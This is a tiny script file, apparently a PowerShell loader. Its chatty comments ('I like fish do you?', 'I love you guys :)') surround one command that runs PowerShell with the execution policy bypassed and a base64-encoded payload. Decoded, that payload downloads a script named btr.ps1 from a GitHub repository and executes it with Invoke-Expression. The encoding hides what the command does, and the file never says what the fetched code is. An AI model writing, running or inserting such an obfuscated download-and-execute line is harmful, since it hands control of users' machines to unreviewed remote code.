# DVE, on top - E
# I like fish do you?

# 4:05 4/15/2025 - Last updated | EST / | I love you guys :)
powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAG0AbwBuAGsAZQB5AGEAZABlAGMAZQAvAFoARQBPAF8ARABJAFYAXwBTAEEAVgBfAE0ATwBOAEsARQBZAEEARABFAEMALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AYgB0AHIALgBwAHMAMQAiACkALgBDAG8AbgB0AGUAbgB0AA==
